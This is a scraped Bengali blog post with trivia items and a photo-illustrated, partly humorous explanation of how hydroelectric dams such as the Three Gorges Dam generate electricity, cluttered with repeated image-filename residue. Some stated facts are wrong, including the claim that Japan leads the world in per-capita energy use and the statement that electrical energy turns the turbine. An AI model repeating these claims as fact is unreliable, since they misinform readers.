(৭) আপনি কি জানেন, একটি টর্নেডোর প্রস্থ মাত্র কয়েক গজ থেকে সুরু করে কয়েক মাইল পর্যন্ত হতে পারে ?
(৮) জাপান বিশ্বের অন্য যে কোনো দেশের চাইতে মাথাপিছু বেশি এনার্জি ব্যবহার করে ।
(৯) আপনি কি জানেন, সেন্ট্রালএয়ার কন্ডিশনার সিলিং ফ্যানের চাইতে শতকরা ৯৮ ভাগ বেশি বিদ্যুৎ খরচ করে ?
(১০) আপনি কি জানেন, আমাদের এই মহাশুন্যে প্রায় পাচঁ হাজার কোটি ছায়াপথ আছে? এবং প্রতিটি ছায়াপথে ১০ হাজার কোটি থেকে ১ লক্ষ কোটি তারা আছে ।
.

শনিবার, ২১ জুলাই, ২০১২

পানি দিয়া বিদ্যুৎ উৎপন্ন

পানি শক্তির একটি অন্যতম উৎস। পানির স্রোত ও জোয়ার-ভাটাকে কাজে লাগিয়ে শক্তি উৎপাদন করা যায়। পানির স্রোত বা জোয়ার-ভাটা ব্যবহার করে যে বিদ্যুৎশক্তি উৎপন্ন হয় তাকে পানি বিদ্যুৎ বা জলবিদ্যুৎ বলে। জলবিদ্যুৎ তৈরি করার জন্য সাধারণ শক্তিকে কাজে লাগানো হয়। যে কোনো স্রোতের স্থানে পানিকে বাঁধ দিয়ে আটকালে এর উচ্চতা বৃদ্ধি পায়। পানির উচ্চতা বৃদ্ধি পাওয়ায় বা এর গভীরতা বৃদ্ধি পাওয়ায় এর মধ্যে অধিক পরিমাণ শক্তি বিভব শক্তি হিসেবে জমা হয়। এর জন্য সাধারণত কোনো পাহাড়ের উপত্যকায় নিচের দিকে বাঁধ দিয়ে এটি করা হয়। নদী থেকে আসা পানি বাঁধে বাধা পেয়ে জমা হতে থাকে। এতে বাঁধের পেছনে কৃত্রিম হ্রদের মতো তৈরি হয়। হ্রদ পানিতে পূর্ণ হয়ে গেলে পানি একটি মোটা নল দিয়ে নিচে অবস্থিত কোনো তড়িৎ উৎপাদন কেন্দ্রে ফেলা হয়। পানি পতনের সময় এর বিভব শক্তি গতি শক্তিতে রূপান্তরিত হয়। এই তড়িৎ শক্তি একটি টার্বাইনকে ঘোরায়। টার্বাইন হলো অসংখ্য ব্লেডযুক্ত চাকা। টার্বাইনের সঙ্গে আবার একটি জেনারেটর লাগানো থাকে। টার্বাইন ঘোরার ফলে জেনারেটরে তড়িৎ উৎপন্ন হয়। এরপর উৎপন্ন বিদ্যুৎ নানা স্থানে তারের মাধ্যমে পাঠানো হয়। ১৮৮২ সালের ৩০ সেপ্টেম্বর সর্বপ্রথম জলবিদ্যুৎ কেন্দ্র চালু করা হয় যুক্তরাষ্ট্রের উইসকনসিনে। বর্তমানে উৎপন্ন মোট বিদ্যুতের শতকরা প্রায় ২৪ ভাগই জলবিদ্যুৎ।
আসুন ছবির মাধ্যমে জেনে নেই কিভাবে জলবিদ্যুৎ উৎপন্ন করা হয় পানির প্রবাহ নিয়ন্ত্রনের মাধ্যমে।
mostofa kamal 1325894077 1 hydrodam আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
প্রথমেই দেখে নেই পৃথিবীর সবচেয়ে বড় জলবিদ্যুৎ কেন্দ্র Three Gorges Dam
সামনে থেকে:
mostofa kamal 1325291860 5 Dam আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
পাশ থেকে :
mostofa kamal 1325291845 4 1 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
উপর থেকে:
mostofa kamal 1325291819 2 3gdam আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
যে রকম পরিবেশ দরকার: নদীর দুই পার্শ্বে উচু-উচু পাহাড়। mostofa kamal 1325815489 1 04 minamiaiki dam upper lge আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
দুই পার্শ্বের পাহাড়ের উচ্চতা যত বেশি হবে সেই নদীর জলবিদ্যুৎ উৎপাদনের সামর্থ তত বেশি হইবেক। তবে এটাও মনে রাখতে হবে যে সেখাকার ভূমিরূপের, অর্থাৎ কি রকম মাটি/পাথর দ্বারা গঠিত ঐ সকল পাহাড় ও নদীর তলভাগ।
mostofa kamal 1325815920 2 02ee058 jpg lores আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
অনেকসময় নদীর দুই পার্শ্বে থাকে আগে থেকে গড়ে উঠা মানব বসতি ও বানিজ্যিক এলাকা থাকে যেগুলো জলাধারের উচ্চতা বাড়ার সাথে সাথে পানির নিচে চলে যায় বা স্হানান্তরিত করতে হয়।
আসেন ১খান জলবিদ্যুৎ কেন্দ্র বানাইemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি না আমাদের ৬০ মেগাওয়াট এর কাপ্তাই জলবিদ্যুৎ কেন্দ্র না emot slices 25 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 25 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 25 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিবানামু যখন, তখন পৃথিবীর সবচেয়ে বড় জলবিদ্যুৎ কেন্দ্র Three Gorges Dam ই বানাইemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
mostofa kamal 1325817012 3 Construction 2 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
চলেন দেহি সিভিল ইন্জিনিয়ার মামারা কেমনে সাইট ডিজাইন করে জাইনা নেই: mostofa kamal 1325818867 5 hydropower plant parts আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
আসেন এইবার দেহি ম্যাকানিকাল ও ইলেকট্রিকাল ইন্জিনিয়ার মামারাemot slices 03 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 03 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 03 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি কেমতে বিদ্যুৎ উৎপন্ন করার যন্ত্রর-মন্ত্ররগুলা (টারবাইন ও জেনারেটর)বসায়
 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
ম্যাকানিকাল ও ইলেকট্রিকাল মামা, যন্ত্রর-মন্ত্ররগুলার নাট-বল্টুগুলা যে একবার দেখবার মুন্চায়emot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 05 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
আগে ইলেকট্রিকাল মামারা যন্ত্রর-মন্ত্ররগুলার একখান ডিজাইন বানাইয়া দিল ফ্যারাডে মামুর সুত্র:
mostofa kamal 1325822096 12 Faradays Law আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
(ইলেকট্রিক তারের প্যাজকির মধ্য দিয়া চুম্বক দৌড়া-দৌড়ি করিলে তারের মধ্য দিয়া বিদ্যুৎ প্রবাহিত হইবেকemot slices 18 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 18 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 18 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি) ব্যবহার কইরা ম্যাকানিকাল মামাদের।আরো জানবার চান ফ্যারাডে মামুর সুত্র কেমতে কাজ করে এইহেনে গুতা মারেন।
mostofa kamal 1325819398 7 hydroturbine আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
এইবার ম্যাকানিকাল মামারা জব্বর একখান জিনিস বানাইল emot slices 09 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 09 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 09 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
mostofa kamal 1325819685 8 hydropower plant usrb shaft আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
এইবার আমার লগে আহেন দেহি সিভিল, ম্যাকানিকাল ও ইলেকট্রিকাল মামারা ৩ জনে মিলা কি বানাইল দেখবার যাই emot slices 07 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 07 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 07 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
mostofa kamal 1325819139 6 generators edit আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
মামারা, সবইতো করলা এইবার দেহাও দেহি কেমতে কি করো ঐ যন্ত্রর খানা দিয়াemot slices 26 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 26 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 26 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
mostofa kamal 1325819822 10 wuhytypicalplant আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
মামুর বেটা অহনো বুঝবার পারেন নাই বাহে emot slices 16 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 16 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 16 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করিemot slices 16 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি কান্না-কাটি কইরেন না
mostofa kamal 1325820103 11 hydrodam আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
পানিগুলান উপরের ছবিতে যত নিরীহ ভাবে বের হইতাছে দেখতাছেন আসলেই কি তত নিরীহ ভাবে বের হচ্ছে??? mostofa kamal 1325822487 13 three gorges dam1 আইসেন বাহে পানি দিয়া বিদ্যুৎ উৎপন্ন করি
এই হল  একটা জলবিদ্যুৎ কেন্দ্রের হাড়ির খবর।